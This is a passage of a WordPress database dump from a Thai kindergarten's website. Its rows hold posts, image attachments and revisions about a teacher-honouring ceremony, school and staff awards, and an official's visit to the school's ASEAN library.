/wp:image -->\n\n<!-- wp:image {\"id\":530,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508840596_122233206260202781_3423997656757381309_n-1024x726.jpg\" alt=\"\" class=\"wp-image-530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":531,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509097393_122233208444202781_2856922640003344449_n-1024x726.jpg\" alt=\"\" class=\"wp-image-531\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":532,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509332829_122233206698202781_2228971549485358971_n-1024x726.jpg\" alt=\"\" class=\"wp-image-532\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":533,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509382438_122233208474202781_1076240601356784110_n-1024x726.jpg\" alt=\"\" class=\"wp-image-533\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":534,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509434857_122233205768202781_2301112012794045645_n-1024x726.jpg\" alt=\"\" class=\"wp-image-534\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":535,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509590616_122233204442202781_5742782962099935264_n-724x1024.jpg\" alt=\"\" class=\"wp-image-535\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','เมื่อวันที่ 12 มิถุนายน 2568 โรงเรียนอนุบาลวัดพระโต ได้จัดพิธีไหว้ครู ประจำปีการศึกษา 2568 เป็นกิจกรรมที่ส่งเสริมให้นักเรียนมีความกตัญญูกตเวที แสดงความเคารพนับถือและระลึกพระคุณครู ผู้ถ่ายทอดสรรพวิชาความรู้ให้กับศิษย์ด้วยความรัก ความเมตตา และความปรารถนาดี โดยมี นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญโรงเรียนอนุบาลวัดพระโต เป็นประธานในพิธี พร้อมด้วยคณะผู้บริหาร ครูและบุคลากรทางการศึกษา และนักเรียนร่วมกิจกรรมอย่างพร้อมเพรียง ณ หอประชุมโรงเรียนอนุบาลวัดพระโต','','publish','open','open','','%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-12-%e0%b8%a1%e0%b8%b4%e0%b8%96%e0%b8%b8%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%99-2568-%e0%b9%82%e0%b8%a3','','','2025-06-27 14:14:02','2025-06-27 07:14:02','',0,'http://watprato.ssk.in.th/?p=514',0,'post','',0),
(515,1,'2025-06-27 14:12:07','2025-06-27 07:12:07','','508515966_122233488296202781_3641426539455570755_n','','inherit','open','closed','','508515966_122233488296202781_3641426539455570755_n-2','','','2025-06-27 14:12:07','2025-06-27 07:12:07','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508515966_122233488296202781_3641426539455570755_n-1.jpg',0,'attachment','image/jpeg',0),
(516,1,'2025-06-27 14:12:07','2025-06-27 07:12:07','','509561039_122233485938202781_5092953145952209112_n','','inherit','open','closed','','509561039_122233485938202781_5092953145952209112_n-2','','','2025-06-27 14:12:07','2025-06-27 07:12:07','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509561039_122233485938202781_5092953145952209112_n-1.jpg',0,'attachment','image/jpeg',0),
(517,1,'2025-06-27 14:12:07','2025-06-27 07:12:07','','509255489_122233488332202781_3849008079105916440_n','','inherit','open','closed','','509255489_122233488332202781_3849008079105916440_n-2','','','2025-06-27 14:12:07','2025-06-27 07:12:07','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509255489_122233488332202781_3849008079105916440_n-1.jpg',0,'attachment','image/jpeg',0),
(518,1,'2025-06-27 14:12:07','2025-06-27 07:12:07','','509432476_122233488362202781_6256446827292890718_n','','inherit','open','closed','','509432476_122233488362202781_6256446827292890718_n-2','','','2025-06-27 14:12:07','2025-06-27 07:12:07','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509432476_122233488362202781_6256446827292890718_n-1.jpg',0,'attachment','image/jpeg',0),
(519,1,'2025-06-27 14:12:07','2025-06-27 07:12:07','','508566839_122233488350202781_5291093760071081349_n','','inherit','open','closed','','508566839_122233488350202781_5291093760071081349_n-2','','','2025-06-27 14:12:07','2025-06-27 07:12:07','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508566839_122233488350202781_5291093760071081349_n-1.jpg',0,'attachment','image/jpeg',0),
(520,1,'2025-06-27 14:12:07','2025-06-27 07:12:07','','510004299_122233487084202781_6268732022722924528_n','','inherit','open','closed','','510004299_122233487084202781_6268732022722924528_n-2','','','2025-06-27 14:12:07','2025-06-27 07:12:07','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/510004299_122233487084202781_6268732022722924528_n-1.jpg',0,'attachment','image/jpeg',0),
(521,1,'2025-06-27 14:12:12','2025-06-27 07:12:12','','510226912_122233485428202781_3363047737425267891_n','','inherit','open','closed','','510226912_122233485428202781_3363047737425267891_n-2','','','2025-06-27 14:12:12','2025-06-27 07:12:12','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/510226912_122233485428202781_3363047737425267891_n-1.jpg',0,'attachment','image/jpeg',0),
(522,1,'2025-06-27 14:12:12','2025-06-27 07:12:12','','510905776_122233487132202781_8330824708694035019_n','','inherit','open','closed','','510905776_122233487132202781_8330824708694035019_n-2','','','2025-06-27 14:12:12','2025-06-27 07:12:12','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/510905776_122233487132202781_8330824708694035019_n-1.jpg',0,'attachment','image/jpeg',0),
(523,1,'2025-06-27 14:12:47','2025-06-27 07:12:47','','508658382_122233208516202781_580202122741841251_n','','inherit','open','closed','','508658382_122233208516202781_580202122741841251_n','','','2025-06-27 14:12:47','2025-06-27 07:12:47','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508658382_122233208516202781_580202122741841251_n.jpg',0,'attachment','image/jpeg',0),
(524,1,'2025-06-27 14:13:25','2025-06-27 07:13:25','','507733863_122233208372202781_4817239570500527554_n','','inherit','open','closed','','507733863_122233208372202781_4817239570500527554_n','','','2025-06-27 14:13:25','2025-06-27 07:13:25','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/507733863_122233208372202781_4817239570500527554_n.jpg',0,'attachment','image/jpeg',0),
(525,1,'2025-06-27 14:13:25','2025-06-27 07:13:25','','508557200_122233205786202781_8640392528716628766_n','','inherit','open','closed','','508557200_122233205786202781_8640392528716628766_n','','','2025-06-27 14:13:25','2025-06-27 07:13:25','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508557200_122233205786202781_8640392528716628766_n.jpg',0,'attachment','image/jpeg',0),
(526,1,'2025-06-27 14:13:25','2025-06-27 07:13:25','','508658382_122233208516202781_580202122741841251_n','','inherit','open','closed','','508658382_122233208516202781_580202122741841251_n-2','','','2025-06-27 14:13:25','2025-06-27 07:13:25','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508658382_122233208516202781_580202122741841251_n-1.jpg',0,'attachment','image/jpeg',0),
(527,1,'2025-06-27 14:13:25','2025-06-27 07:13:25','','508593390_122233208462202781_2021394309803679795_n','','inherit','open','closed','','508593390_122233208462202781_2021394309803679795_n','','','2025-06-27 14:13:25','2025-06-27 07:13:25','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508593390_122233208462202781_2021394309803679795_n.jpg',0,'attachment','image/jpeg',0),
(528,1,'2025-06-27 14:13:26','2025-06-27 07:13:26','','508690066_122233208312202781_1715080013664278025_n','','inherit','open','closed','','508690066_122233208312202781_1715080013664278025_n','','','2025-06-27 14:13:26','2025-06-27 07:13:26','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508690066_122233208312202781_1715080013664278025_n.jpg',0,'attachment','image/jpeg',0),
(529,1,'2025-06-27 14:13:26','2025-06-27 07:13:26','','508778331_122233208414202781_4423758755946843051_n','','inherit','open','closed','','508778331_122233208414202781_4423758755946843051_n','','','2025-06-27 14:13:26','2025-06-27 07:13:26','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508778331_122233208414202781_4423758755946843051_n.jpg',0,'attachment','image/jpeg',0),
(530,1,'2025-06-27 14:13:30','2025-06-27 07:13:30','','508840596_122233206260202781_3423997656757381309_n','','inherit','open','closed','','508840596_122233206260202781_3423997656757381309_n','','','2025-06-27 14:13:30','2025-06-27 07:13:30','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508840596_122233206260202781_3423997656757381309_n.jpg',0,'attachment','image/jpeg',0),
(531,1,'2025-06-27 14:13:31','2025-06-27 07:13:31','','509097393_122233208444202781_2856922640003344449_n','','inherit','open','closed','','509097393_122233208444202781_2856922640003344449_n','','','2025-06-27 14:13:31','2025-06-27 07:13:31','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509097393_122233208444202781_2856922640003344449_n.jpg',0,'attachment','image/jpeg',0),
(532,1,'2025-06-27 14:13:31','2025-06-27 07:13:31','','509332829_122233206698202781_2228971549485358971_n','','inherit','open','closed','','509332829_122233206698202781_2228971549485358971_n','','','2025-06-27 14:13:31','2025-06-27 07:13:31','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509332829_122233206698202781_2228971549485358971_n.jpg',0,'attachment','image/jpeg',0),
(533,1,'2025-06-27 14:13:31','2025-06-27 07:13:31','','509382438_122233208474202781_1076240601356784110_n','','inherit','open','closed','','509382438_122233208474202781_1076240601356784110_n','','','2025-06-27 14:13:31','2025-06-27 07:13:31','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509382438_122233208474202781_1076240601356784110_n.jpg',0,'attachment','image/jpeg',0),
(534,1,'2025-06-27 14:13:31','2025-06-27 07:13:31','','509434857_122233205768202781_2301112012794045645_n','','inherit','open','closed','','509434857_122233205768202781_2301112012794045645_n','','','2025-06-27 14:13:31','2025-06-27 07:13:31','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509434857_122233205768202781_2301112012794045645_n.jpg',0,'attachment','image/jpeg',0),
(535,1,'2025-06-27 14:13:33','2025-06-27 07:13:33','','509590616_122233204442202781_5742782962099935264_n','','inherit','open','closed','','509590616_122233204442202781_5742782962099935264_n','','','2025-06-27 14:13:33','2025-06-27 07:13:33','',514,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509590616_122233204442202781_5742782962099935264_n.jpg',0,'attachment','image/jpeg',0),
(536,1,'2025-06-27 14:14:01','2025-06-27 07:14:01','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":524,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/507733863_122233208372202781_4817239570500527554_n-1024x726.jpg\" alt=\"\" class=\"wp-image-524\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":525,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508557200_122233205786202781_8640392528716628766_n-1024x726.jpg\" alt=\"\" class=\"wp-image-525\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":527,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508593390_122233208462202781_2021394309803679795_n-1024x726.jpg\" alt=\"\" class=\"wp-image-527\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":526,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508658382_122233208516202781_580202122741841251_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-526\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":528,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508690066_122233208312202781_1715080013664278025_n-1024x726.jpg\" alt=\"\" class=\"wp-image-528\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":529,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508778331_122233208414202781_4423758755946843051_n-1024x726.jpg\" alt=\"\" class=\"wp-image-529\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":530,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508840596_122233206260202781_3423997656757381309_n-1024x726.jpg\" alt=\"\" class=\"wp-image-530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":531,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509097393_122233208444202781_2856922640003344449_n-1024x726.jpg\" alt=\"\" class=\"wp-image-531\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":532,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509332829_122233206698202781_2228971549485358971_n-1024x726.jpg\" alt=\"\" class=\"wp-image-532\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":533,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509382438_122233208474202781_1076240601356784110_n-1024x726.jpg\" alt=\"\" class=\"wp-image-533\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":534,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509434857_122233205768202781_2301112012794045645_n-1024x726.jpg\" alt=\"\" class=\"wp-image-534\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":535,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509590616_122233204442202781_5742782962099935264_n-724x1024.jpg\" alt=\"\" class=\"wp-image-535\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','เมื่อวันที่ 12 มิถุนายน 2568 โรงเรียนอนุบาลวัดพระโต ได้จัดพิธีไหว้ครู ประจำปีการศึกษา 2568 เป็นกิจกรรมที่ส่งเสริมให้นักเรียนมีความกตัญญูกตเวที แสดงความเคารพนับถือและระลึกพระคุณครู ผู้ถ่ายทอดสรรพวิชาความรู้ให้กับศิษย์ด้วยความรัก ความเมตตา และความปรารถนาดี โดยมี นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญโรงเรียนอนุบาลวัดพระโต เป็นประธานในพิธี พร้อมด้วยคณะผู้บริหาร ครูและบุคลากรทางการศึกษา และนักเรียนร่วมกิจกรรมอย่างพร้อมเพรียง ณ หอประชุมโรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','514-revision-v1','','','2025-06-27 14:14:01','2025-06-27 07:14:01','',514,'http://watprato.ssk.in.th/?p=536',0,'revision','',0),
(537,1,'2025-06-27 14:16:47','2025-06-27 07:16:47','<!-- wp:image {\"id\":538,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n-1024x538.jpg\" alt=\"\" class=\"wp-image-538\"/></figure>\n<!-- /wp:image -->','นางรำไพ อดทน ได้รับรางวัล “รองผู้อำนวยการสถานศึกษาดีเด่น ด้านผลงานวิชาการที่เป็นเลิศ” ซึ่งรับเกียรติบัตรจาก ว่าที่ร้อยตรีธนุ วงษ์จินดา เลขาธิการคณะกรรมการการศึกษาขั้นพื้นฐาน ในการประชุมใหญ่สามัญประจำปี 2567 ของสมาคมโรงเรียนประถมศึกษาประจำจังหวัดภาคตะวันออกเฉียงเหนือ ณ โรงเรียนเมืองนครราชสีมา จังหวัดนครราชสีมา','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82-10','','','2025-06-27 14:18:24','2025-06-27 07:18:24','',0,'http://watprato.ssk.in.th/?p=537',0,'post','',0),
(538,1,'2025-06-27 14:16:41','2025-06-27 07:16:41','','508661855_122233182278202781_1372776762413040353_n','','inherit','open','closed','','508661855_122233182278202781_1372776762413040353_n','','','2025-06-27 14:16:41','2025-06-27 07:16:41','',537,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg',0,'attachment','image/jpeg',0),
(539,1,'2025-06-27 14:16:47','2025-06-27 07:16:47','<!-- wp:image {\"id\":538,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n-1024x538.jpg\" alt=\"\" class=\"wp-image-538\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ได้รับรางวัล “สถานศึกษาที่มีการปฏิบัติที่เป็นเลิศ”','','inherit','closed','closed','','537-revision-v1','','','2025-06-27 14:16:47','2025-06-27 07:16:47','',537,'http://watprato.ssk.in.th/?p=539',0,'revision','',0),
(540,1,'2025-06-27 14:18:15','2025-06-27 07:18:15','<!-- wp:image {\"id\":538,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n-1024x538.jpg\" alt=\"\" class=\"wp-image-538\"/></figure>\n<!-- /wp:image -->','นางรำไพ อดทน ได้รับรางวัล “รองผู้อำนวยการสถานศึกษาดีเด่น ด้านผลงานวิชาการที่เป็นเลิศ” ซึ่งรับเกียรติบัตรจาก ว่าที่ร้อยตรีธนุ วงษ์จินดา เลขาธิการคณะกรรมการการศึกษาขั้นพื้นฐาน ในการประชุมใหญ่สามัญประจำปี 2567 ของสมาคมโรงเรียนประถมศึกษาประจำจังหวัดภาคตะวันออกเฉียงเหนือ ณ โรงเรียนเมืองนครราชสีมา จังหวัดนครราชสีมา','','inherit','closed','closed','','537-revision-v1','','','2025-06-27 14:18:15','2025-06-27 07:18:15','',537,'http://watprato.ssk.in.th/?p=540',0,'revision','',0),
(541,1,'2025-06-27 14:19:49','2025-06-27 07:19:49','<!-- wp:image {\"id\":542,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1024x538.jpg\" alt=\"\" class=\"wp-image-542\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ได้รับรางวัล “สถานศึกษาที่มีการปฏิบัติที่เป็นเลิศ” ซึ่งรับเกียรติบัตรจาก ว่าที่ร้อยตรีธนุ วงษ์จินดา เลขาธิการคณะกรรมการการศึกษาขั้นพื้นฐาน ในการประชุมใหญ่สามัญประจำปี 2567 ของสมาคมโรงเรียนประถมศึกษาประจำจังหวัดภาคตะวันออกเฉียงเหนือ ณ โรงเรียนเมืองนครราชสีมา จังหวัดนครราชสีมา','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82-11','','','2025-06-27 14:24:54','2025-06-27 07:24:54','',0,'http://watprato.ssk.in.th/?p=541',0,'post','',0),
(543,1,'2025-06-27 14:19:49','2025-06-27 07:19:49','<!-- wp:image {\"id\":542,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1024x538.jpg\" alt=\"\" class=\"wp-image-542\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ได้รับรางวัล “สถานศึกษาที่มีการปฏิบัติที่เป็นเลิศ” ซึ่งรับเกียรติบัตรจาก ว่าที่ร้อยตรีธนุ วงษ์จินดา เลขาธิการคณะกรรมการการศึกษาขั้นพื้นฐาน ในการประชุมใหญ่สามัญประจำปี 2567 ของสมาคมโรงเรียนประถมศึกษาประจำจังหวัดภาคตะวันออกเฉียงเหนือ ณ โรงเรียนเมืองนครราชสีมา จังหวัดนครราชสีมา','','inherit','closed','closed','','541-revision-v1','','','2025-06-27 14:19:49','2025-06-27 07:19:49','',541,'http://watprato.ssk.in.th/?p=543',0,'revision','',0),
(544,1,'2025-06-27 14:24:23','2025-06-27 07:24:23','','508745932_122233182272202781_2147005512618392889_n','','inherit','open','closed','','508745932_122233182272202781_2147005512618392889_n','','','2025-06-27 14:24:23','2025-06-27 07:24:23','',541,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n.jpg',0,'attachment','image/jpeg',0),
(546,1,'2025-06-27 14:28:01','2025-06-27 07:28:01','<!-- wp:image {\"id\":547,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508860809_122233022552202781_5930562876512911766_n-724x1024.jpg\" alt=\"\" class=\"wp-image-547\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ได้รับรางวัล “สถานศึกษาที่มีการปฏิบัติที่เป็นเลิศ” และนางรำไพ อดทน ได้รับรางวัล “รองผู้อำนวยการสถานศึกษาดีเด่น ด้านผลงานวิชาการที่เป็นเลิศ” ซึ่งรับเกียรติบัตรจาก ว่าที่ร้อยตรีธนุ วงษ์จินดา เลขาธิการคณะกรรมการการศึกษาขั้นพื้นฐาน','','publish','open','open','','546','','','2025-06-27 14:35:48','2025-06-27 07:35:48','',0,'http://watprato.ssk.in.th/?p=546',0,'post','',0),
(547,1,'2025-06-27 14:27:45','2025-06-27 07:27:45','','508860809_122233022552202781_5930562876512911766_n','','inherit','open','closed','','508860809_122233022552202781_5930562876512911766_n','','','2025-06-27 14:27:45','2025-06-27 07:27:45','',546,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508860809_122233022552202781_5930562876512911766_n.jpg',0,'attachment','image/jpeg',0),
(548,1,'2025-06-27 14:28:01','2025-06-27 07:28:01','<!-- wp:image {\"id\":547,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508860809_122233022552202781_5930562876512911766_n-724x1024.jpg\" alt=\"\" class=\"wp-image-547\"/></figure>\n<!-- /wp:image -->','','','inherit','closed','closed','','546-revision-v1','','','2025-06-27 14:28:01','2025-06-27 07:28:01','',546,'http://watprato.ssk.in.th/?p=548',0,'revision','',0),
(549,1,'2025-06-27 14:29:04','2025-06-27 07:29:04','<!-- wp:image {\"id\":550,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509590616_122233204442202781_5742782962099935264_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-550\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ได้จัดพิธีไหว้ครู ประจำปีการศึกษา 2568','','publish','open','open','','549','','','2025-06-27 14:34:46','2025-06-27 07:34:46','',0,'http://watprato.ssk.in.th/?p=549',0,'post','',0),
(550,1,'2025-06-27 14:28:56','2025-06-27 07:28:56','','509590616_122233204442202781_5742782962099935264_n','','inherit','open','closed','','509590616_122233204442202781_5742782962099935264_n-2','','','2025-06-27 14:28:56','2025-06-27 07:28:56','',549,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509590616_122233204442202781_5742782962099935264_n-1.jpg',0,'attachment','image/jpeg',0),
(551,1,'2025-06-27 14:29:04','2025-06-27 07:29:04','<!-- wp:image {\"id\":550,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509590616_122233204442202781_5742782962099935264_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-550\"/></figure>\n<!-- /wp:image -->','','','inherit','closed','closed','','549-revision-v1','','','2025-06-27 14:29:04','2025-06-27 07:29:04','',549,'http://watprato.ssk.in.th/?p=551',0,'revision','',0),
(552,1,'2025-06-27 14:30:56','2025-06-27 07:30:56','<!-- wp:image {\"id\":553,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510226912_122233485428202781_3363047737425267891_n-2-724x1024.jpg\" alt=\"\" class=\"wp-image-553\"/></figure>\n<!-- /wp:image -->','ท่านดร.สุวิทย์ มังคละ รองอธิบดีกรมอาเซียน กระทรวงการต่างประเทศ พร้อมคณะ ที่ได้ให้เกียรติมาตรวจเยี่ยมห้องสมุดอาเซียน ซึ่งเป็นห้องสมุดแห่งที่ 44 ในโครงการห้องสมุดอาเซียน : 1 จังหวัด 1 โรงเรียน 1 ห้องสมุดอาเซียน','','publish','open','open','','%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c-%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c%e0%b8%87%e0%b8%b2%e0%b8%a1-%e0%b8%9c-2','','','2025-06-27 14:33:00','2025-06-27 07:33:00','',0,'http://watprato.ssk.in.th/?p=552',0,'post','',0),
(553,1,'2025-06-27 14:30:44','2025-06-27 07:30:44','','510226912_122233485428202781_3363047737425267891_n','','inherit','open','closed','','510226912_122233485428202781_3363047737425267891_n-3','','','2025-06-27 14:30:44','2025-06-27 07:30:44','',552,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/510226912_122233485428202781_3363047737425267891_n-2.jpg',0,'attachment','image/jpeg',0),
(554,1,'2025-06-27 14:30:56','2025-06-27 07:30:56','<!-- wp:image {\"id\":553,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510226912_122233485428202781_3363047737425267891_n-2-724x1024.jpg\" alt=\"\" class=\"wp-image-553\"/></figure>\n<!-- /wp:image -->','นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ พร้อมด้วยคณะรองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนได้ร่วมต้อนรับ ท่านดร.สุวิทย์ มังคละ รองอธิบดีกรมอาเซียน กระทรวงการต่างประเทศ พร้อมคณะ ที่ได้ให้เกียรติมาตรวจเยี่ยมห้องสมุดอาเซียน ซึ่งเป็นห้องสมุดแห่งที่ 44 ในโครงการห้องสมุดอาเซียน : 1 จังหวัด 1 โรงเรียน 1 ห้องสมุดอาเซียน','','inherit','closed','closed','','552-revision-v1','','','2025-06-27 14:30:56','2025-06-27 07:30:56','',552,'http://watprato.ssk.in.th/?p=554',0,'revision','',0),
